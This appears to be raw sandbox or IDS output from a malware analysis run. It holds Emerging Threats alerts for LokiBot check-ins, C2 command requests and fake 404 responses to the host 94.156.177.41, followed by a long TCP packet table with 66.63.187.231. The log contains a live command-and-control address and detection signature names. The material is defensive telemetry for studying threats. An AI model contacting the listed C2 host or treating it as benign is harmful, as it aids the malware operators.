                                                                                                                              2024-11-20T10:58:41.787253+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458829TCP
                                                                                                                              2024-11-20T10:58:41.944294+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:41.944294+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:41.944294+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:42.700127+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:42.700127+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:42.707455+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458830TCP
                                                                                                                              2024-11-20T10:58:42.863234+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:42.863234+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:42.863234+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:43.621342+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:43.621342+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:43.626218+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458831TCP
                                                                                                                              2024-11-20T10:58:43.784646+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:43.784646+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:43.784646+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:44.665098+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:44.665098+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:44.673346+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458832TCP
                                                                                                                              2024-11-20T10:58:45.036254+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.036254+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.036254+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.774285+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.774285+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.779217+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458833TCP
                                                                                                                              2024-11-20T10:58:45.931402+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.931402+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:45.931402+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:46.706839+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:46.706839+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:46.711977+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458834TCP
                                                                                                                              2024-11-20T10:58:46.868272+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:46.868272+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:46.868272+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:47.637543+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:47.637543+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:47.644969+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458835TCP
                                                                                                                              2024-11-20T10:58:47.801637+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:47.801637+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:47.801637+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:48.568051+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:48.568051+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:48.573043+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458836TCP
                                                                                                                              2024-11-20T10:58:48.719401+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:48.719401+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:48.719401+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:49.472958+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:49.472958+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:49.481216+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458837TCP
                                                                                                                              2024-11-20T10:58:49.631590+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:49.631590+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:49.631590+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:50.369375+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:50.369375+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:50.374368+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458838TCP
                                                                                                                              2024-11-20T10:58:50.531924+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45883994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:50.531924+01002025381ET MALWARE LokiBot Checkin1192.168.2.45883994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:50.531924+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45883994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:51.270204+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45883994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:51.270204+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45883994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:51.275613+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458839TCP
                                                                                                                              2024-11-20T10:58:51.462507+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:51.462507+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:51.462507+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:52.210518+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:52.210518+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:52.215522+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458840TCP
                                                                                                                              2024-11-20T10:58:52.365083+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:52.365083+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:52.365083+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:53.245528+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:53.245528+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:53.253974+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458841TCP
                                                                                                                              2024-11-20T10:58:53.422435+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:53.422435+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:53.422435+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:54.194984+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:54.194984+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:54.200047+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458842TCP
                                                                                                                              2024-11-20T10:58:54.359199+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:54.359199+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:54.359199+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:55.228559+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:55.228559+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:55.236154+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458843TCP
                                                                                                                              2024-11-20T10:58:55.384693+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:55.384693+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:55.384693+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:56.119265+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:56.119265+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:56.125650+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458844TCP
                                                                                                                              2024-11-20T10:58:56.456663+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:56.456663+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:56.456663+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:57.203522+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:57.203522+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:57.208517+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458845TCP
                                                                                                                              2024-11-20T10:58:57.368693+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:57.368693+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:57.368693+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:58.145779+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:58.145779+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:58.152996+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458846TCP
                                                                                                                              2024-11-20T10:58:58.299878+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:58.299878+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:58.299878+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:59.067132+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:59.067132+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:59.072614+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458847TCP
                                                                                                                              2024-11-20T10:58:59.223139+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:59.223139+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:59.223139+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884894.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:00.142398+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884894.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:00.142398+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884894.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:00.169904+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458848TCP
                                                                                                                              2024-11-20T10:59:00.315009+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45884994.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:00.315009+01002025381ET MALWARE LokiBot Checkin1192.168.2.45884994.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:00.315009+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45884994.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:01.196244+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45884994.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:01.196244+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45884994.156.177.4180TCP
                                                                                                                              2024-11-20T10:59:01.201970+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458849TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 20, 2024 10:57:04.748236895 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:04.857717991 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:04.858241081 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:04.858405113 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:04.863959074 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.600949049 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.601052999 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.601090908 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.601149082 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.601330042 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.601330042 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.601814985 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.601851940 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.601910114 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.602579117 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.602617025 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.602663994 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.603575945 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.603611946 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.603660107 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.603744030 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.604146004 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.604428053 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.614397049 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.614478111 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.614661932 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.614723921 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.692564011 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.692728996 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.712671995 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.712738991 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.713031054 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.713059902 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.713109970 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.713109970 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.713893890 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.713920116 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.713949919 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.713969946 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.715018034 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.715044975 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.715094090 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.715094090 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.716350079 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.716376066 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.716406107 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.716417074 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.716464996 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.716464996 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.718059063 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.718085051 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.718131065 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.718131065 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.718852043 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.718877077 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.718907118 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.718950987 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.719508886 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.719537973 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.719580889 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.719580889 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.720016956 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.720045090 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.720065117 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.720067978 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.720101118 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.720132113 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.720707893 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.720750093 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.720766068 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.720803022 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.721059084 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.721107960 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.742218971 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.742377043 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.743591070 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.743613005 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.743670940 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.743670940 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.779146910 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.779253960 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.842377901 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.842453003 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.842469931 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.842638016 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.842998028 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.843017101 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.843033075 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.843168974 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.843168974 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.844716072 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.844738960 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.844870090 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.845360994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.845376968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.845455885 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.845455885 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.846339941 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.846358061 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.846447945 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.847311020 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.847335100 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.847382069 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.847430944 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.848258018 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.848274946 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.848331928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.849087000 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.849103928 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.849118948 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.849181890 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.849181890 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.849886894 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.849903107 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.849956989 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.849967957 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.851037025 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.851058006 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.851120949 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.851120949 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.851535082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.851713896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.851731062 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.851764917 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.851764917 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.852866888 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.852883101 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.852897882 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.852912903 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.852963924 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.852963924 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.853847980 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.853864908 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.853882074 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.853940010 CET4973080192.168.2.466.63.187.231
